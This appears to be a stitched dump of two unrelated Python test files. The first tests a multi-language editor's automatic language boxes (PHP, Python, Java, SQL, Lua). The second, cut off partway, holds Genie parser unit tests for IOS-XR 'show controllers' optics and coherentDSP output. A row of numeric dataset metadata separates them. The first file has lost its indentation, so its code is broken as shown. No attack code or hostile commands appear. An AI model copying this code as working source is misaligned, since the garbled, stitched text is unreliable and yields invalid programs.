treemanager.add_parser(parser, lexer, "")
for c in "x = FROM table":
treemanager.key_normal(c)
assert len(treemanager.parsers) == 1
assert parser.error_nodes[0].autobox is None # would be set without excluding TEXT
def test_autoremove_pythonsql(self):
parser, lexer = pythonsql.load()
parser.setup_autolbox(pythonsql.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
for c in "x = SELECT * FROM table":
treemanager.key_normal(c)
assert parser.last_status == True
assert len(treemanager.parsers) == 2
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
treemanager.key_normal("*") # valid Python now
assert len(treemanager.parsers) == 1
assert parser.last_status == True
def test_php_python_paste(self):
parser, lexer = phppython.load()
parser.setup_autolbox(phppython.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
for c in "class X{\n}":
treemanager.key_normal(c)
assert len(treemanager.parsers) == 1
treemanager.key_cursors(LEFT)
treemanager.key_normal("\n")
treemanager.key_cursors(UP)
treemanager.key_normal(" ")
treemanager.key_normal(" ")
treemanager.key_normal(" ")
treemanager.key_normal(" ")
treemanager.pasteText("def x():\n pass;")
assert parser.last_status is True
assert len(treemanager.parsers) == 2
def test_php_python_paste2(self):
parser, lexer = phppython.load()
parser.setup_autolbox(phppython.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
for c in "function x(){\n}":
treemanager.key_normal(c)
assert len(treemanager.parsers) == 1
treemanager.key_cursors(LEFT)
treemanager.key_normal("\n")
treemanager.key_cursors(UP)
treemanager.key_normal(" ")
treemanager.key_normal(" ")
treemanager.key_normal(" ")
treemanager.key_normal(" ")
treemanager.pasteText("$x = def x():\n pass;")
# XXX problem: error happens on `}` but `reduce_ends` only checks
# next terminal which is `<return>` and can be parsed
assert parser.last_status is True
assert len(treemanager.parsers) == 2
def test_python_sql_bug(self):
parser, lexer = pythonsql.load()
parser.setup_autolbox(pythonsql.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
for c in "x = SELECT * FROM table":
treemanager.key_normal(c)
assert len(treemanager.parsers) == 2
for _ in range(5):
treemanager.key_cursors(LEFT)
treemanager.key_normal("*")
assert len(treemanager.parsers) == 1
treemanager.key_backspace()
assert len(treemanager.parsers) == 2
def test_newbug(self):
parser, lexer = phppython.load()
parser.setup_autolbox(phppython.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
phpprogram = """function x(){
$x = 12;
}"""
# delete 12
treemanager.import_file(phpprogram)
treemanager.key_cursors(DOWN)
treemanager.key_end()
treemanager.key_cursors(LEFT)
treemanager.key_backspace()
treemanager.key_backspace()
for c in "[1,2.3]":
treemanager.key_normal(c)
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
# check that there wasn't a language box inserted around '1'
assert treemanager.cursor.node.symbol.name == "1"
def test_newbug2(self):
parser, lexer = phppython.load()
parser.setup_autolbox(phppython.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
for c in """function x(){
$x = [1,2,3];
}""":
treemanager.key_normal(c)
def test_newbug3(self):
parser, lexer = phppython.load()
parser.setup_autolbox(phppython.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
p = """function x(){
$x = [1,2,3];
}"""
treemanager.import_file(p)
treemanager.key_cursors(DOWN)
treemanager.key_cursors(DOWN)
treemanager.key_end()
for c in range(len(p)):
treemanager.key_backspace()
def test_php_bug4(self):
parser, lexer = phppython.load()
parser.setup_autolbox(phppython.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
p = """function x(){
return 12;
}"""
treemanager.import_file(p)
treemanager.key_cursors(DOWN)
treemanager.key_home()
for c in " $x = def y():":
treemanager.key_normal(c)
assert len(treemanager.parsers) == 2
def test_java_py_string(self):
parser, lexer = javapy.load()
parser.setup_autolbox(javapy.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
p = """class X {
int x = "test";
}"""
for c in p:
treemanager.key_normal(c)
def test_java_sql_autoremove_valid_boxes(self):
parser, lexer = javasqlchemical.load()
parser.setup_autolbox(javasqlchemical.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
p = """class X {
int x = 1;
}"""
for c in p:
treemanager.key_normal(c)
assert len(treemanager.parsers) == 1
treemanager.key_cursors(UP)
treemanager.key_end()
treemanager.key_cursors(LEFT)
treemanager.key_backspace()
for c in "SELECT * FROM table;":
treemanager.key_normal(c)
assert len(treemanager.parsers) == 2
treemanager.key_backspace() # delete ;
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
treemanager.key_normal("*")
assert len(treemanager.parsers) == 1
def test_java_python_method_insert_bug1(self):
parser, lexer = javapy.load()
parser.setup_autolbox(javapy.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
p = """class X {
public boolean main(){}
}"""
for c in p:
treemanager.key_normal(c)
assert len(treemanager.parsers) == 1
treemanager.key_cursors(UP)
treemanager.key_cursors(UP)
treemanager.key_cursors(UP)
treemanager.key_home()
for c in " ":
treemanager.key_normal(c)
treemanager.key_normal("d")
assert len(treemanager.parsers) == 1
def test_deactivate_autobox_after_undo(self):
"""Once an automatically inserted language box has been
undone, it shouldn't be inserted again on another change."""
parser, lexer = javapy.load()
parser.setup_autolbox(javapy.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
program = """class X {
int x = 12;
}"""
for c in program:
treemanager.key_normal(c)
assert len(treemanager.parsers) == 1
treemanager.key_cursors(UP)
treemanager.key_end()
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
for c in " and ":
treemanager.key_normal(c)
assert len(treemanager.parsers) == 2
treemanager.key_ctrl_z()
assert len(treemanager.parsers) == 1
treemanager.key_cursors(RIGHT)
for c in " or 3":
treemanager.key_normal(c)
assert len(treemanager.parsers) == 1
def test_php_python_whitespace_bug(self):
parser, lexer = phppython.load()
parser.setup_autolbox(phppython.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
p = """class X {
d();
}"""
for c in p:
treemanager.key_normal(c)
assert len(treemanager.parsers) == 2
treemanager.key_cursors(UP)
treemanager.key_end()
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
assert treemanager.parsers[0][0].last_status is True # PHP
assert treemanager.parsers[1][0].last_status is True # Python
treemanager.key_normal(" ")
assert treemanager.parsers[0][0].last_status is True
assert treemanager.parsers[1][0].last_status is False
treemanager.key_backspace()
assert treemanager.parsers[0][0].last_status is True
assert treemanager.parsers[1][0].last_status is True
import os
@pytest.mark.skipif("TRAVIS" in os.environ and os.environ["TRAVIS"] == "true", reason="JavaSQL takes too long to built on Travis. Skip!")
def test_java_sql_skip_comments(self):
p = """public class Scribble {
public void init() {
// A comment
this.foo1(code.replace());
// Another comment
this.foo2();
}
}"""
parser, lexer = javasql.load()
parser.setup_autolbox(javasql.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
for c in p:
treemanager.key_normal(c)
assert parser.last_status == True
treemanager.key_cursors(UP)
treemanager.key_cursors(UP)
treemanager.key_cursors(UP)
treemanager.key_cursors(UP)
treemanager.key_cursors(UP)
treemanager.key_end()
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
for _ in range(14):
treemanager.key_backspace()
assert parser.last_status == True
p = """SELECT ProductName
FROM Products
WHERE ProductID IN (SELECT ProductID FROM OrderDetails WHERE Quantity = 10);"""
for c in p:
treemanager.key_normal(c)
assert len(treemanager.parsers) == 2
assert parser.last_status == True
def test_java_sql_ranking(self):
p = """class C {
int x = 1, y = 2;
int y = 1 + 2 * 3;
int z = 4 + 5 - 6;
}"""
parser, lexer = javasql.load()
parser.setup_autolbox(javasql.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
for c in p:
treemanager.key_normal(c)
treemanager.key_cursors(UP)
treemanager.key_cursors(UP)
treemanager.key_cursors(UP)
treemanager.key_end()
for i in range(8): treemanager.key_cursors(LEFT)
treemanager.key_backspace()
for s in "SELECT a":
treemanager.key_normal(s)
assert len(parser.error_nodes[0].autobox) == 2
def test_php_python_autoremove(self):
"""Sometimes automatically inserted boxes are valid in both languages.
Previously we only autoremoved boxes that were invalid. However, we
should always prioritise the outer language instead even if the language
box is a valid insertion."""
parser, lexer = phppython.load()
parser.setup_autolbox(phppython.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
treemanager.key_normal("f")
assert len(treemanager.parsers) == 2
treemanager.key_normal("o")
assert len(treemanager.parsers) == 2
treemanager.key_normal("o")
assert len(treemanager.parsers) == 2
treemanager.key_normal("(")
assert len(treemanager.parsers) == 1
treemanager.key_normal(")")
assert len(treemanager.parsers) == 2
treemanager.key_normal(";")
assert len(treemanager.parsers) == 1
assert parser.last_status == True
@pytest.mark.xfail
def test_php_python_auto_bug(self):
"""PHP equivalent to `test_java_python3`. Fails because `public` is
optional in PHP and thus can be used in a Python box without making the
PHP program invalid."""
parser, lexer = phppython.load()
parser.setup_autolbox(phppython.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
p = """class X {
public function x(){}
}"""
for c in p:
treemanager.key_normal(c)
assert len(treemanager.parsers) == 1
assert parser.last_status == True
treemanager.key_cursors(UP)
treemanager.key_home()
treemanager.key_cursors(RIGHT)
treemanager.key_cursors(RIGHT)
treemanager.key_cursors(RIGHT)
treemanager.key_cursors(RIGHT)
treemanager.key_normal("d")
assert len(treemanager.parsers) == 1
assert parser.last_status == False
def test_java_lua_dont_remove_explicit_lboxes(self):
grm = load_json_grammar("test/javalua_expr.json")
parser, lexer = grm.load()
parser.setup_autolbox(grm.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
p = """class X {
int x = 1;
}"""
for c in p:
treemanager.key_normal(c)
assert len(treemanager.parsers) == 1
assert parser.last_status == True
treemanager.key_cursors(UP)
treemanager.key_end()
treemanager.key_cursors(LEFT)
treemanager.add_languagebox(lang_dict["Lua expr"])
treemanager.key_normal("a")
assert len(treemanager.parsers) == 2
assert parser.last_status == False
@pytest.mark.skip("Broken by line heuristic. Requires expanding boxes to include following language boxes.")
def test_java_php_expand(self):
grm = load_json_grammar("test/javaphp_expr.json")
parser, lexer = grm.load()
parser.setup_autolbox(grm.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
p = """class X {
int x = 1 == 2;
}"""
for c in p:
treemanager.key_normal(c)
assert len(treemanager.parsers) == 1
assert parser.last_status == True
treemanager.key_cursors(UP)
treemanager.key_end()
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
treemanager.key_backspace() # delete `1`
p2 = "!e($x) ? $y : $z"
for c in p2:
treemanager.key_normal(c)
assert len(treemanager.parsers) == 2
assert parser.last_status == False # only `!e($x)` wrapped in lbox
treemanager.key_end()
treemanager.key_cursors(LEFT)
treemanager.key_backspace()
treemanager.key_backspace()
treemanager.key_backspace()
treemanager.key_backspace()
assert len(treemanager.parsers) == 2 # box now has been expanded
assert parser.last_status == True
def test_java_php_shrink_bug(self):
grm = load_json_grammar("test/javaphp_expr.json")
parser, lexer = grm.load()
parser.setup_autolbox(grm.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
assert len(treemanager.parsers) == 1
p = """class X {
public void println() {
if (numPrinted >= numLines) {
}
int x = (a == 'x');
}
}"""
treemanager.import_file(p)
assert len(treemanager.parsers) == 1
assert parser.last_status == True
treemanager.key_cursors(DOWN)
treemanager.key_cursors(DOWN)
treemanager.key_end()
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
for i in range(22):
treemanager.key_backspace()
p2 = "'set_transient_' . $transient'"
for c in p2:
treemanager.key_normal(c)
assert parser.last_status == True
def test_java_php_shrink_bug2(self):
grm = load_json_grammar("test/javaphp_expr.json")
parser, lexer = grm.load()
parser.setup_autolbox(grm.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
assert len(treemanager.parsers) == 1
p = """class X {
public void println() {
if (i < fDepth - 1) {
System.out.print(',');
}
}
}"""
treemanager.import_file(p)
assert len(treemanager.parsers) == 1
assert parser.last_status == True
treemanager.key_cursors(DOWN)
treemanager.key_cursors(DOWN)
treemanager.key_end()
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
for i in range(14):
treemanager.key_backspace()
p2 = "d('i') && $s->l('i')"
for c in p2:
treemanager.key_normal(c)
assert parser.last_status == True
def test_java_php_preparse_bug(self):
grm = load_json_grammar("test/javaphp_expr.json")
parser, lexer = grm.load()
parser.setup_autolbox(grm.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
assert len(treemanager.parsers) == 1
p = """class C {
public static int contents = {
{ SOMEVAR, "strubg" },
{ ANOTHERVAR, "string ',' string!"}
};
}"""
treemanager.import_file(p)
assert len(treemanager.parsers) == 1
assert parser.last_status == True
treemanager.key_cursors(DOWN)
treemanager.key_cursors(DOWN)
treemanager.key_end()
for i in range(13):
treemanager.key_cursors(LEFT)
for i in range(7):
treemanager.key_backspace()
for c in "'test'":
print("input", c)
treemanager.key_normal(c)
def test_java_php_slashslash_bug(self):
grm = load_json_grammar("test/javaphp_expr.json")
parser, lexer = grm.load()
parser.setup_autolbox(grm.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
assert len(treemanager.parsers) == 1
p = """class C {
int x = 1;
}"""
treemanager.import_file(p)
assert len(treemanager.parsers) == 1
assert parser.last_status == True
treemanager.key_cursors(DOWN)
treemanager.key_end()
treemanager.key_cursors(LEFT);
treemanager.key_backspace()
for c in "$this . 'http://":
treemanager.key_normal(c)
treemanager.key_normal("'")
assert parser.last_status is True
assert len(treemanager.parsers) == 2
@pytest.mark.skipif("TRAVIS" in os.environ and os.environ["TRAVIS"] == "true", reason="Sqlite takes too long to built on Travis. Skip!")
def test_lua_sqlite_expand(self):
grm = load_json_grammar("test/luasqlite_expr.json")
parser, lexer = grm.load()
parser.setup_autolbox(grm.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
p = """x = 1
y = 2"""
for c in p:
treemanager.key_normal(c)
assert len(treemanager.parsers) == 1
assert parser.last_status == True
treemanager.key_cursors(UP)
treemanager.key_end()
treemanager.key_backspace()
p2 = "INSERT INTO k2 VALUES(a, NULL); PRAGMA f(k2);"
for c in p2:
treemanager.key_normal(c)
assert len(treemanager.parsers) == 2
assert parser.last_status == True
@pytest.mark.skipif("TRAVIS" in os.environ and os.environ["TRAVIS"] == "true", reason="Sqlite takes too long to built on Travis. Skip!")
def test_sqlite_java_shrink(self):
grm = load_json_grammar("test/sqlitejava_expr.json")
parser, lexer = grm.load()
parser.setup_autolbox(grm.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
p = "SELECT a FROM t;"
for c in p:
treemanager.key_normal(c)
assert len(treemanager.parsers) == 1
assert parser.last_status == True
treemanager.key_home()
for i in range(8):
treemanager.key_cursors(RIGHT)
treemanager.key_normal("(")
treemanager.key_normal(")")
treemanager.key_normal(".") # wrap `a(). FROM` in lbox
treemanager.key_normal("d") # shrink box to `a().d`
assert len(treemanager.parsers) == 2
assert parser.last_status == True
@pytest.mark.skipif("TRAVIS" in os.environ and os.environ["TRAVIS"] == "true", reason="Sqlite takes too long to built on Travis. Skip!")
def test_lua_sqlite_bug(self):
grm = load_json_grammar("test/luasqlite_expr.json")
parser, lexer = grm.load()
parser.setup_autolbox(grm.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
p = """x = 1,2
y = 2"""
for c in p:
treemanager.key_normal(c)
assert len(treemanager.parsers) == 1
assert parser.last_status == True
treemanager.key_cursors(UP)
treemanager.key_end()
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
treemanager.key_backspace()
p2 = "SELECT a FROM t1;"
for c in p2:
treemanager.key_normal(c)
assert len(treemanager.parsers) == 2
assert parser.last_status == True
| 33.013771 | 141 | 0.614732 | 21,885 | 182,203 | 4.954444 | 0.044277 | 0.198934 | 0.132143 | 0.064854 | 0.848416 | 0.830643 | 0.81051 | 0.780739 | 0.756603 | 0.729046 | 0 | 0.011554 | 0.274167 | 182,203 | 5,518 | 142 | 33.019754 | 0.808324 | 0.058797 | 0 | 0.812556 | 0 | 0.00089 | 0.096571 | 0.011986 | 0 | 0 | 0 | 0 | 0.098175 | 1 | 0.048976 | false | 0.020926 | 0.03317 | 0 | 0.095726 | 0.012689 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c96670e2b9e731ab08e9a11f05b2996087200023 | 81,711 | py | Python | src/genie/libs/parser/iosxr/tests/test_show_controllers.py | k01ek/genieparser | c19954ad111835bf3f413f3500ca9ce8ed8bb804 | [
"Apache-2.0"
] | null | null | null | src/genie/libs/parser/iosxr/tests/test_show_controllers.py | k01ek/genieparser | c19954ad111835bf3f413f3500ca9ce8ed8bb804 | [
"Apache-2.0"
] | null | null | null | src/genie/libs/parser/iosxr/tests/test_show_controllers.py | k01ek/genieparser | c19954ad111835bf3f413f3500ca9ce8ed8bb804 | [
"Apache-2.0"
] | null | null | null |
# Python
import unittest
from unittest.mock import Mock
# Genie
from genie.metaparser.util.exceptions import SchemaEmptyParserError
# iosxr show_controllers
from genie.libs.parser.iosxr.show_controllers import (ShowControllersCoherentDSP,
ShowControllersOptics,
ShowControllersFiaDiagshellL2showLocation,
ShowControllersFiaDiagshellDiagEgrCalendarsLocation)
# =====================================================
# Unit test for 'show controllers coherentDSP {port}'
# =====================================================
class test_show_controllers_coherentDSP(unittest.TestCase):
'''Unit test for show controllers coherentDSP {port}'''
maxDiff = None
empty_output = {'execute.return_value': ''}
golden_parsed_output = {
"0/0/1/2": {
"port": "CoherentDSP 0/0/1/2",
"controller_state": "Up",
"inherited_secondary_state": "Normal",
"configured_secondary_state": "Normal",
"derived_state": "In Service",
"loopback_mode": "None",
"ber_thresholds_sf": "1.0E-5",
"ber_thresholds_sd": "1.0E-7",
"performance_monitoring": "Enable",
"alarm_info": {
"los": 1,
"lof": 0,
"lom": 0,
"oof": 0,
"oom": 0,
"ais": 0,
"iae": 0,
"biae": 0,
"sf_ber": 0,
"sd_ber": 0,
"bdi": 2,
"tim": 0,
"fecmis_match": 0,
"fec_unc": 0
},
"detected_alarms": "None",
"bit_error_rate_info": {
"prefec_ber": "0.0E+00",
"postfec_ber": "0.0E+00",
},
"otu_tti": "Received",
"fec_mode": "STANDARD"
},
}
golden_output = {'execute.return_value': '''
#show controllers coherentDSP 0/0/1/2
Sat Aug 3 03:10:15.685 EST
Port : CoherentDSP 0/0/1/2
Controller State : Up
Inherited Secondary State : Normal
Configured Secondary State : Normal
Derived State : In Service
Loopback mode : None
BER Thresholds : SF = 1.0E-5 SD = 1.0E-7
Performance Monitoring : Enable
Alarm Information:
LOS = 1 LOF = 0 LOM = 0
OOF = 0 OOM = 0 AIS = 0
IAE = 0 BIAE = 0 SF_BER = 0
SD_BER = 0 BDI = 2 TIM = 0
FECMISMATCH = 0 FEC-UNC = 0
Detected Alarms : None
Bit Error Rate Information
PREFEC BER : 0.0E+00
POSTFEC BER : 0.0E+00
OTU TTI Received
FEC mode : STANDARD
'''}
def test_empty(self):
self.device = Mock(**self.empty_output)
obj = ShowControllersCoherentDSP(device=self.device)
with self.assertRaises(SchemaEmptyParserError):
parsed_output = obj.parse(port='0/0/1/2')
def test_golden(self):
self.device = Mock(**self.golden_output)
obj = ShowControllersCoherentDSP(device=self.device)
parsed_output = obj.parse(port='0/0/1/2')
self.assertEqual(parsed_output, self.golden_parsed_output)
# ==================================================
# Unit test for 'show controllers optics {port}'
# ==================================================
class test_show_controllers_optics(unittest.TestCase):
'''Unit test for show controllers optics {port}'''
maxDiff = None
empty_output = {'execute.return_value': ''}
golden_parsed_output1 = {
"0/0/0/0": {
"name": "Optics 0/0/0/0",
"controller_state": "Up",
"transport_admin_state": "In Service",
"laser_state": "On",
"led_state": "Green",
"optics_status": {
"optics_type": "SFP+ 10G SR",
"wavelength": "850.00 nm",
"alarm_status": {
"detected_alarms": [],
},
"los_lol_fault_status": {},
"laser_bias_current": "6.1 mA",
"actual_tx_power": "-2.45 dBm",
"rx_power": "-7.56 dBm",
"performance_monitoring": "Enable",
"threshold_values": {
"Rx Power Threshold(dBm)": {
"parameter": "Rx Power Threshold(dBm)",
"high_alarm": "2.0",
"low_alarm": "-13.9",
"high_warning": "-1.0",
"low_warning": "-9.9"
},
"Tx Power Threshold(dBm)": {
"parameter": "Tx Power Threshold(dBm)",
"high_alarm": "1.6",
"low_alarm": "-11.3",
"high_warning": "-1.3",
"low_warning": "-7.3"
},
"LBC Threshold(mA)": {
"parameter": "LBC Threshold(mA)",
"high_alarm": "10.00",
"low_alarm": "2.00",
"high_warning": "10.00",
"low_warning": "2.00"
},
"Temp. Threshold(celsius)": {
"parameter": "Temp. Threshold(celsius)",
"high_alarm": "75.00",
"low_alarm": "-5.00",
"high_warning": "70.00",
"low_warning": "0.00"
},
"Voltage Threshold(volt)": {
"parameter": "Voltage Threshold(volt)",
"high_alarm": "3.63",
"low_alarm": "2.97",
"high_warning": "3.46",
"low_warning": "3.13"
}
},
"polarization_parameters": "not supported by optics",
"temperature": "35.00 Celsius",
"voltage": "3.26 V"
},
"transceiver_vendor_details": {
"form_factor": "SFP+",
"optics_type": "SFP+ 10G SR",
"name": "CISCO-AVAGO",
"oui_number": "00.17.6a",
"part_number": "SFBR-7702SDZ-CS5",
"rev_number": "G2.5",
"serial_number": "AGD162040SP",
"pid": "SFP-10G-SR",
"vid": "V03",
"date_code": "12/05/20"
}
}
}
golden_output1 = {'execute.return_value': '''
#show controllers optics 0/0/0/0
Sat Aug 3 03:11:08.682 EST
Controller State: Up
Transport Admin State: In Service
Laser State: On
LED State: Green
Optics Status
Optics Type: SFP+ 10G SR
Wavelength = 850.00 nm
Alarm Status:
-------------
Detected Alarms: None
LOS/LOL/Fault Status:
Laser Bias Current = 6.1 mA
Actual TX Power = -2.45 dBm
RX Power = -7.56 dBm
Performance Monitoring: Enable
THRESHOLD VALUES
----------------
Parameter High Alarm Low Alarm High Warning Low Warning
------------------------ ---------- --------- ------------ -----------
Rx Power Threshold(dBm) 2.0 -13.9 -1.0 -9.9
Tx Power Threshold(dBm) 1.6 -11.3 -1.3 -7.3
LBC Threshold(mA) 10.00 2.00 10.00 2.00
Temp. Threshold(celsius) 75.00 -5.00 70.00 0.00
Voltage Threshold(volt) 3.63 2.97 3.46 3.13
Polarization parameters not supported by optics
Temperature = 35.00 Celsius
Voltage = 3.26 V
Transceiver Vendor Details
Form Factor : SFP+
Optics type : SFP+ 10G SR
Name : CISCO-AVAGO
OUI Number : 00.17.6a
Part Number : SFBR-7702SDZ-CS5
Rev Number : G2.5
Serial Number : AGD162040SP
PID : SFP-10G-SR
VID : V03
Date Code(yy/mm/dd) : 12/05/20
'''}
golden_parsed_output2 = {
"0/0/1/2": {
"name": "Optics 0/0/1/2",
"controller_state": "Up",
"transport_admin_state": "In Service",
"laser_state": "On",
"led_state": "Green",
"optics_status": {
"optics_type": "CFP2 DWDM",
"dwdm_carrier_info": "C BAND",
"msa_itu_channel": "97",
"frequency": "191.30THz",
"wavelength": "1567.133nm",
"alarm_status": {
"detected_alarms": [],
},
"los_lol_fault_status": {},
"alarm_statistics": {
"high_rx_pwr": 0,
"low_rx_pwr": 1,
"high_tx_pwr": 0,
"low_tx_pwr": 1,
"high_lbc": 0,
"high_dgd": 0,
"oor_cd": 0,
"osnr": 0,
"wvl_ool": 0,
"mea": 0,
"improper_rem": 0,
"tc_power_prov_mismatch": 0
},
"laser_bias_current": "0.0 %",
"actual_tx_power": "0.99 dBm",
"rx_power": "-20.50 dBm",
"performance_monitoring": "Enable",
"threshold_values": {
"Rx Power Threshold(dBm)": {
"parameter": "Rx Power Threshold(dBm)",
"high_alarm": "1.5",
"low_alarm": "-30.0",
"high_warning": "0.0",
"low_warning": "0.0"
},
"Tx Power Threshold(dBm)": {
"parameter": "Tx Power Threshold(dBm)",
"high_alarm": "3.5",
"low_alarm": "-10.0",
"high_warning": "0.0",
"low_warning": "0.0"
},
"LBC Threshold(mA)": {
"parameter": "LBC Threshold(mA)",
"high_alarm": "N/A",
"low_alarm": "N/A",
"high_warning": "0.00",
"low_warning": "0.00"
}
},
"lbc_high_threshold": "98 %",
"configured_tx_power": "1.00 dBm",
"configured_osnr_lower_threshold": "0.00 dB",
"configured_dgd_higher_threshold": "180.00 ps",
"chromatic_dispersion": "5 ps/nm",
"configured_cd_min": "-10000 ps/nm ",
"configured_cd_max": "16000 ps/nm",
"optical_snr": "27.00 dB",
"polarization_dependent_loss": "0.00 dB",
"differential_group_delay": "2.00 ps"
},
"transceiver_vendor_details": {
"form_factor": "CFP2",
"name": "CISCO-ACACIA",
"part_number": "AC200-D23-190",
"rev_number": "16672",
"serial_number": "180653009",
"pid": "ONS-C2-WDM-DE-1HL",
"vid": "VES#",
"date_code": "18/02/03"
}
}
}
golden_output2 = {'execute.return_value': '''
#show controllers optics 0/0/1/2
Sat Aug 3 03:11:51.141 EST
Controller State: Up
Transport Admin State: In Service
Laser State: On
LED State: Green
Optics Status
Optics Type: CFP2 DWDM
DWDM carrier Info: C BAND, MSA ITU Channel=97, Frequency=191.30THz,
Wavelength=1567.133nm
Alarm Status:
-------------
Detected Alarms: None
LOS/LOL/Fault Status:
Alarm Statistics:
-------------
HIGH-RX-PWR = 0 LOW-RX-PWR = 1
HIGH-TX-PWR = 0 LOW-TX-PWR = 1
HIGH-LBC = 0 HIGH-DGD = 0
OOR-CD = 0 OSNR = 0
WVL-OOL = 0 MEA = 0
IMPROPER-REM = 0
TX-POWER-PROV-MISMATCH = 0
Laser Bias Current = 0.0 %
Actual TX Power = 0.99 dBm
RX Power = -20.50 dBm
Performance Monitoring: Enable
THRESHOLD VALUES
----------------
Parameter High Alarm Low Alarm High Warning Low Warning
------------------------ ---------- --------- ------------ -----------
Rx Power Threshold(dBm) 1.5 -30.0 0.0 0.0
Tx Power Threshold(dBm) 3.5 -10.0 0.0 0.0
LBC Threshold(mA) N/A N/A 0.00 0.00
LBC High Threshold = 98 %
Configured Tx Power = 1.00 dBm
Configured OSNR lower Threshold = 0.00 dB
Configured DGD Higher Threshold = 180.00 ps
Chromatic Dispersion 5 ps/nm
Configured CD-MIN -10000 ps/nm CD-MAX 16000 ps/nm
Optical Signal to Noise Ratio = 27.00 dB
Polarization Dependent Loss = 0.00 dB
Differential Group Delay = 2.00 ps
Transceiver Vendor Details
Form Factor : CFP2
Name : CISCO-ACACIA
Part Number : AC200-D23-190
Rev Number : 16672
Serial Number : 180653009
PID : ONS-C2-WDM-DE-1HL
VID : VES#
Date Code(yy/mm/dd) : 18/02/03
'''}
golden_parsed_output3 = {
"0/0/0/20": {
"name": "Optics 0/0/0/20",
"controller_state": "Down",
"transport_admin_state": "In Service",
"laser_state": "Off",
"optics_status": {
"optics_type": "Unavailable",
"dwdm_carrier_info": "Unavailable",
"msa_itu_channel": "Unavailable",
"frequency": "Unavailable",
"wavelength": "Unavailable",
"actual_tx_power": "Unavailable",
"rx_power": "Unavailable"
}
}
}
golden_output3 = {'execute.return_value': '''
#show controllers optics 0/0/0/20
Sat Aug 3 03:15:25.076 EST
Controller State: Down
Transport Admin State: In Service
Laser State: Off
Optics not present
Optics Type: Unavailable
DWDM Carrier Info: Unavailable, MSA ITU Channel= Unavailable, Frequency= Unavailable , Wavelength= Unavailable
TX Power = Unavailable
RX Power = Unavailable
'''}
golden_parsed_output4 = {
"0/0/0/18": {
"name": "Optics 0/0/0/18",
"controller_state": "Up",
"transport_admin_state": "In Service",
"laser_state": "Off",
"led_state": "Off",
"optics_status": {
"optics_type": "SFP+ 10G SR",
"wavelength": "850.00 nm",
"alarm_status": {
"detected_alarms": [
"LOW-RX1-PWR",
"LOW-TX1-PWR",
"LOW-TX1_LBC"
]
},
"los_lol_fault_status": {
